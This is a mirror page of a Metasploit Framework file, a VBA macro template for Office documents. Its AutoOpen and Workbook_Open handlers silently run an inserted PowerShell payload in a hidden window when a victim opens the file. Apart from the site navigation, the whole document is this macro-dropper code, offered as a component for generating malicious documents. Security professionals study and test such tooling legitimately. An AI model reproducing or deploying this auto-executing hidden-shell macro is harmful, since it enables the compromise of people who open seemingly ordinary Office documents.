CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/data/templates/scripts/to_powershell.vba.template
Views: 1904
Sub %{sub_auto_open}()
  Dim %{var_powershell}
  %{var_powershell} = %{powershell}
  Call Shell(%{var_powershell}, vbHide)
End Sub
Sub AutoOpen()
  %{sub_auto_open}
End Sub
Sub Workbook_Open()
  %{sub_auto_open}
End Sub